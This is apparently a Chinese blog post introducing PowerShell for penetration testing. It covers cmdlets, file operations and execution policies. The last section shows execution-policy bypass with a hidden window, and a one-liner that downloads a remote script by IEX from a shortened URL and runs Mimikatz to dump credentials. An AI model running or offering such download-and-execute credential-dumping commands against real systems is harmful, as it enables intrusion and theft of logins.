powershell基本使用文档

  1. POWERSHELL简介
  2. POWERSPLOIT
  3. 内网渗透实例
    powershell简介
    Powershell 是运行在windows上实现系统和应用程序管理自动化的命令行脚本 环境。你可以把它看成是命令行提示符cmd.exe的扩充,或是颠覆。
    powershell需要.NET环境的支持,同时支持.NET对象。其可读性,易用性,可 以位居当前所有shell之首。 当前powershell有四版本,分别为1.0,2.0, 3.0 ,4.0

powershell简介
CMD命令
netstat ipconfig route print ls/dir cls …
LINUX命令
mkdir rm ls clear …
PowerShell命令的一些基本知识
 PowerShell的命令叫做cmdlet
 具有一致的命名规范,都采用动词名词形式,如New-Item
 动词部分一般为Add、New、Get、 Remove、Set等
 命令的别名一般兼容Windows Command以及Linux Shell,如GetChildItem命令使用dir或ls均可
 PowerShell命令不区分大小写

powershell简介
以文件操作为例讲解PowerShell命令的基本用法
 新建目录 New-Item whitecellclub -ItemType Directory
 新建文件 New-Item light.txt -ItemType File
 删除目录 Remove-Item whitecellclub
 显示文本内容 Get-Content light.txt
 设置文本内容 Set-Content light.txt -Value “i love light so much”
 追加内容 Add-Content light.txt -Value “but i love you more”
 清除内容 Clear-Content light.txt

powershell简介
powershell脚本
了解计算机上的现用执行策略,键入:get-executionpolicy
 Restricted——默认的设置, 不允许任何script运行  AllSigned——只能运行经过数字证书签名的script  RemoteSigned——运行本地的script不需要数字签名,但是运行从网络上 下载的script就必须要有数字签名  Unrestricted——允许所有的script运行。
若要在本地计算机上运行您编写的未签名脚本和来自其他用户的签名脚本, 请使用以下命令将计算机上的执行策略更改为 RemoteSigned: set-executionpolicy remotesigned

powershell简介
powershell脚本
PS C:\Users\administrat0r\Desktop> ‘“Hello,Hackers”’ > test.ps1
PS C:\Users\administrat0r\Desktop> .\test.ps1
Hello,Hackers

powershell脚本
本地权限绕过执行 PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1
本地隐藏权限绕过执行脚本 PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden(隐藏窗口) -File xxx.ps1
直接用IEX下载远程的PS1脚本回来权限绕过执行 powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://is.gd/oeoFuI’); InvokeMimikatz -DumpCreds”

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值